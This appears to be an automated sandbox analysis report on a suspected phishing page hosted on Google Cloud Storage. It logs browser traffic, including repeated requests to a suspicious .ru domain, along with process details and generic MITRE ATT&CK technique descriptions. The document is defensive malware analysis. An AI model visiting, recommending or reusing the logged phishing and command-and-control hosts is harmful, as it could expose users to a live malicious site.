2025-04-15 16:49:51 UTC	496	OUT	GET /images/icons/product/cloud_storage-32.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0B Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:51 UTC	670	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 850 Date: Tue, 15 Apr 2025 16:49:51 GMT Expires: Tue, 15 Apr 2025 16:49:51 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-04-15 16:49:51 UTC	654	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 19 49 44 41 54 58 c3 cd 97 dd 6b d3 50 18 c6 83 37 ea ed 10 ff 84 dd 28 c8 c6 50 44 71 fd 48 ba 75 0c 3b 2f 74 75 30 61 e8 86 55 71 8c 31 d0 75 28 36 4d 5a 6d ad ab db 98 ba 2f 86 4c c1 4b 91 81 8c 81 57 fb 0f 44 f6 65 bb 8f 8b b9 2d 5d d6 36 6d d3 26 3d 9e d3 b4 83 b0 b6 49 fa 01 3b f0 a3 17 c9 fb 3c 4f 72 4e 7a de 83 61 27 7d 00 00 ce 76 4f a5 1b 1e ce 88 9a e8 9e 12 1b 50 6d 59 e6 d6 51 b1 cf 40 0b 40 4f 8b 25 22 00 eb 98 38 a0 d9 78 e0 ab 88 3d fd 2c 5e 44 02 46 57 79 20 8d 27 b3 42 5d d7 84 a8 2d 44 8b 57 f8 63 74 a5 40 25 30 7b 84 15 4d e6 1d 63 a9 bb 7a 2a 09 8c 74 65 30 40 2d eb 48 ea 9e a2 31 9f 02 99 5f 93 2b 19 c3 61 61 25 21 5c 49 1e 69 Data Ascii: PNGIHDR szzIDATXkP7(PDqHu;/tu0aUq1u(6MZm/LKWDe-]6m&=I;<OrNza'}vOPmYQ@@O%"8x=,^DFWy 'B]-DWct@%0{Mcz*te0@-H1_+aa%!\Ii
2025-04-15 16:49:51 UTC	196	IN	Data Raw: ad 26 80 3c 84 3a 5a 9d 41 4f d1 6e 28 29 48 ed 52 13 c5 70 26 27 03 94 20 10 e4 1e 14 5f 03 7a 88 ae 00 e8 9a 61 68 3d 81 b4 63 7c 5a b9 29 ed 1c 65 ad e8 e9 4c 4e 75 10 e4 2e 34 59 cd 18 e5 a3 71 70 15 b4 7b 82 9d 9a 3a e3 56 17 f3 db 84 42 a8 84 70 fc 03 7a 68 94 8f a6 17 6b cb 9a cc 9f cd 85 b1 be 59 f6 02 ee d8 83 e2 ea 91 42 ac c8 68 7c be 02 1e 8f 6f 5e ea 9b d8 d6 7e 34 eb f0 87 7a 09 18 02 77 ec aa e7 d5 0e 34 5d ce a0 83 dc 71 07 fa cb 3d 9c 9e ee f9 10 aa b3 7d 52 4f cf f8 4e 7d 97 3f 50 0f 6b cf 9c f8 d3 f7 7f 4c 43 26 8f bb 11 b4 30 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: &<:ZAOn()HRp&' _zah=c\|Z)eLNu.4Yqp{:VBpzhkYBh\|o^~4zw4]q=}RON}?PkLC&0IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	104.21.25.37	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:54 UTC	580	OUT	GET /chiriya$exfe HTTP/1.1 Host: iglq7.mlniojjrwm.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://storage.googleapis.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://storage.googleapis.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:55 UTC	281	IN	HTTP/1.1 200 OK Date: Tue, 15 Apr 2025 16:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Access-Control-Allow-Origin: * Cf-Cache-Status: DYNAMIC CF-RAY: 930cf05eac1a0861-MIA alt-svc: h3=":443"; ma=86400
2025-04-15 16:49:55 UTC	6	IN	Data Raw: 31 0d 0a 30 0d 0a Data Ascii: 10
2025-04-15 16:49:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	104.21.25.37	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:55 UTC	395	OUT	GET /chiriya$exfe HTTP/1.1 Host: iglq7.mlniojjrwm.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:56 UTC	281	IN	HTTP/1.1 200 OK Date: Tue, 15 Apr 2025 16:49:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Access-Control-Allow-Origin: * Cf-Cache-Status: DYNAMIC CF-RAY: 930cf0660d724fce-MIA alt-svc: h3=":443"; ma=86400
2025-04-15 16:49:56 UTC	6	IN	Data Raw: 31 0d 0a 30 0d 0a Data Ascii: 10
2025-04-15 16:49:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	104.21.25.37	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:50:06 UTC	580	OUT	GET /chiriya$exfe HTTP/1.1 Host: iglq7.mlniojjrwm.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://storage.googleapis.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://storage.googleapis.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:50:07 UTC	281	IN	HTTP/1.1 200 OK Date: Tue, 15 Apr 2025 16:50:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Access-Control-Allow-Origin: * Cf-Cache-Status: DYNAMIC CF-RAY: 930cf0a7fcfb5674-MIA alt-svc: h3=":443"; ma=86400
2025-04-15 16:50:07 UTC	6	IN	Data Raw: 31 0d 0a 30 0d 0a Data Ascii: 10
2025-04-15 16:50:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	104.21.25.37	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:50:07 UTC	395	OUT	GET /chiriya$exfe HTTP/1.1 Host: iglq7.mlniojjrwm.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:50:08 UTC	281	IN	HTTP/1.1 200 OK Date: Tue, 15 Apr 2025 16:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Access-Control-Allow-Origin: * Cf-Cache-Status: DYNAMIC CF-RAY: 930cf0ae9d531308-MIA alt-svc: h3=":443"; ma=86400
2025-04-15 16:50:08 UTC	6	IN	Data Raw: 31 0d 0a 30 0d 0a Data Ascii: 10
2025-04-15 16:50:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	12:49:35
Start date:	15/04/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:49:39
Start date:	15/04/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2524,i,14905595182361241848,15735740418327197154,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2556 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:49:45
Start date:	15/04/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/pastagiaperio/index.html"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://storage.googleapis.com/pastagiaperio/index.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 1832, Parent PID: 3484

General

Windows Analysis Report
https://storage.googleapis.com/pastagiaperio/index.html